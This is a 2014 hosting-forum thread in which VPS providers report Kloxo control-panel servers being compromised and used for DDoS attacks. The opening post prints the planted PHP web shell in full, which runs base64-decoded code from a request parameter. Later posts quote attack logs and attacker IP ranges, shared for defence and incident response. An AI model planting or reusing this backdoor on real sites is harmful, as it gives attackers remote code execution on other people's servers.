Kloxo installations compromised

Damian · Jan 28, 2014

We had been considering dropping the Kloxo "Host In A Box" template anyway, since it hasn't been updated for 2+ years, but now the final nail has been driven into the coffin.

Our clients are getting their Kloxo installations compromised with a randomly-named PHP file placed into ./home/kloxo/httpd/default/, which is the 'default' site accessible by IP address.

UPDATE: default.php in the same directory will also be compromised. See source here: http://disclosed.info/?9b00e7fa79636e07#rZKQYHUkErNv0ZFArSkUyBQ8C8YLSVaSsaRVo9nfypc=

This PHP file contains (also at http://disclosed.info/?7c12a1a4560b7664#5fpnfdknf4EfBcGqLjeV9/vAY1RXEKkLC3+fqm16c6E= ):

<?php

set_time_limit(0);error_reporting(NULL);

if(($_REQUEST['8ba7afbaaddc67de33a3f'])!=NULL){eval(base64_decode($_REQUEST['8ba7afbaaddc67de33a3f']));}

else{echo '<!DOCTYPE HTML PUBLIC\"-//IETF//DTDHTML 2.0//EN\"><html><head><title></title></head><body>Access denied.</body ></html >';}

?>

Where the $_REQUEST variable is a random value. The basic premise of the script is: if the specific $_REQUEST variable is set, then decode and run all of the code passed via variable. This is obviously bad.

All of the requests to run the script successfully have, thus far, come from: 176.31.146.168 (France, OVH Systems, OVH Systems, AS16276 OVH Systems, doesn't have rDNS)

Currently, these are being used to send extremely wimpy (20-40k pps, see http://d.pr/i/BXlo ) DDOS; the script used seems to be poorly written, as it slams CPU usage before it gets anywhere near maximum network utilization. We've had 4 instances this morning, and it's effected Ramnode, if not others. Beware!

peterw · Jan 28, 2014

Second free panel which does have security issues.

Steven · Jan 28, 2014

Important to note that the default.php file is owned by root.

vRozenSch00n · Jan 28, 2014

Kloxo "Host In A Box" template is a disaster as it has never been upgraded for years. Moreover, regular user never upgrade new installation to the latest version (6.1.12) and they don't use any firewall.

Even the latest version has many vulnerabilities i.e. recursive bind, apache exploit through lxphp, brute force through the admin login and several other minor issues such as master/slave config that will break apache vhost configuration.

AFAIK there was a disagreement among the developers, that leads to the Kloxo-MR fork.

SkylarM · Jan 28, 2014

We don't provide that template, but just suspended like 15-20 containers for this. Killed CPU on nodes long before any massive network issues, but the amount of them caused a few fun times

Steven · Jan 28, 2014

Null 178.248.23.0/24 on your network everyone.

vRozenSch00n · Jan 28, 2014

My test VPS was also compromised with the same issue, and I found out from the log that they brute forced the control panel login. The log shows that it comes from IP 178.248.23.39

Steven · Jan 28, 2014

It appears to be an sql Injection:

access_log:178.248.23.58 - [26/Jan/2014:18:11:58 +0300] "<snipped the inject> HTTP/1.1" 200 5 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0"

They are getting access the admin user:

login_success:12:27 Jan/27/2014: Successful Login to admin from 178.248.23.29

They are injecting files using display.php

shell_exec:12:27 Jan/27/2014: 0: [(__system__:/usr/local/lxlabs/kloxo/httpdocs) 'chmod' '0644' '/home/kloxo/httpd/default/default.php']
filesys:12:27 Jan/27/2014: Chown /home/kloxo/httpd/default/default.php to root:root

NOTE: default.php is being injected into 'every' account.

SkylarM · Jan 28, 2014

I hate Kloxo. I hate zPanel. Ugh.

DaringHost · Jan 28, 2014

Also just suspended a decent number of VPS's who were effected by this. I checked the admin access logs for one client and see that the admin account was accessed by these two IP addresses: 178.248.23.122 and 178.248.23.174

Nulled 178.248.23.0/24 across all servers.

vRozenSch00n · Jan 28, 2014

@Steven It was an old vulnerability http://forum.lxcenter.org/index.php?t=msg&th=19215&prevloaded=1&&start=120

MannDude · Jan 28, 2014

Protect yourselves, but please don't post the actual exploit or method of injecting.

Steven · Jan 28, 2014

vRozenSch00n said:
@Steven It was an old vulnerability http://forum.lxcenter.org/index.php?t=msg&th=19215&prevloaded=1&&start=120

Yes its related to an old hack.

http://forum.lxcenter.org/index.php?t=msg&th=19215&goto=102646&#msg_102646

in specific.

Its being done via the webcommand.php which also calls those functions.

vRozenSch00n · Jan 28, 2014

As I stated before, after the disagreement (which makes me sad

), Kloxo development slowed down and Kloxo-MR managed to fork it's way to a more secure and stable control panel, with the ability to change php version on the fly and using nginx or varnish as reverse proxy.

wlanboy · Jan 28, 2014

SkylarM said:
I hate Kloxo. I hate zPanel. Ugh.

Second that - both are beyond any repair.

DomainBop · Jan 28, 2014

Iniz sent out emails today requiring clients to remove Kloxo immediately. Hopefully other hosts swill also ban the use of Kloxo (and ZPanel) and remove them from their templates.

DomainBop · Jan 28, 2014

vRozenSch00n said:
Moreover, regular user never upgrade new installation to the latest version (6.1.12) and they don't use any firewall.

A very large percentage of web sites are running outdated scripts that contain vulnerabilities, including many corporate websites (example: Wordpress 3.4.2 http://mybuys.com/readme.html). It's not surprising that people/companies don't take the security of their websites seriously since many companies and government agencies allow their employees to surf the Internet from their desks using outdatedbrowsers that are full of vulnerabilities (I'm looking at a piwik report for one of my sites and I see a visitor from the US Postal Service who is using Internet Explorer 7)

MartinD · Jan 28, 2014

This is wreaking havoc - totally come out of nowhere and gone nuts!

wlanboy · Jan 28, 2014

DomainBop said:
Iniz sent out emails today requiring clients to remove Kloxo immediately. Hopefully other hosts swill also ban the use of Kloxo (and ZPanel) and remove them from their templates.

Tactical VPS did that too.

Templates are bad because they suggest (through the eyes of the customer) that they are save by default because the hoster is offering them.

vRozenSch00n · Jan 28, 2014

wlanboy said:
Second that - both are beyond any repair.

I don't know much about zPanel, but in Kloxo's case, there are a lot of rubbish files leftover and rubbish functions. This is due to the fact that late Ligesh wanted to integrate Windows and Debian functionalities (you should have seen the source code prior to version 6.1.6). It's also seems that the way he coded is based on in time patch.

Yes, it needs a whole lot of cleaning up or simply rewrite from scratch.

Kloxo installations compromised

New Member

New Member

New Member

Active Member

Well-Known Member

New Member

Active Member

New Member

Well-Known Member

New Member

Active Member

Just a dude

New Member

Active Member

Content Contributer

Dormant VPSB Pathogen

Dormant VPSB Pathogen

Retired Staff

Content Contributer

Active Member